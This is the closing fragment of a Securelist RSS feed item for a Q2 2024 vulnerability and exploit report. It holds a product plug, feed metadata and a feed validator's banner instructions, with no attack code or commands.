attacks of any complexity, collection of live cyberattack data from around the globe, and basic digital literacy skills for employees. Our <a href="https://www.kaspersky.com/next?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team___knext____7a48716a2c69383d" target="_blank" rel="noopener">Kaspersky NEXT</a> line of solutions ticks all these boxes and more.</li></ul>]]></content:encoded> <wfw:commentRss>https://securelist.com/vulnerability-exploit-report-q2-2024/113455/feed/</wfw:commentRss> <slash:comments>0</slash:comments> <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21072724/SL-vulnerability-exploit-report-featured.jpg" width="1376" height="864"><media:keywords>full</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21072724/SL-vulnerability-exploit-report-featured-1024x643.jpg" width="1024" height="643"><media:keywords>large</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21072724/SL-vulnerability-exploit-report-featured-300x188.jpg" width="300" height="188"><media:keywords>medium</media:keywords></media:content><media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/08/21072724/SL-vulnerability-exploit-report-featured-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content> </item> </channel></rss> If you would like to create a banner that links to this page (i.e. this validation result), do the following:
Download the "valid RSS" banner.
Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)
Add this HTML to your page (change the image src attribute if necessary):
If you would like to create a text link instead, here is the URL you can use:
http://www.feedvalidator.org/check.cgi?url=http%3A//securelist.com/feed/
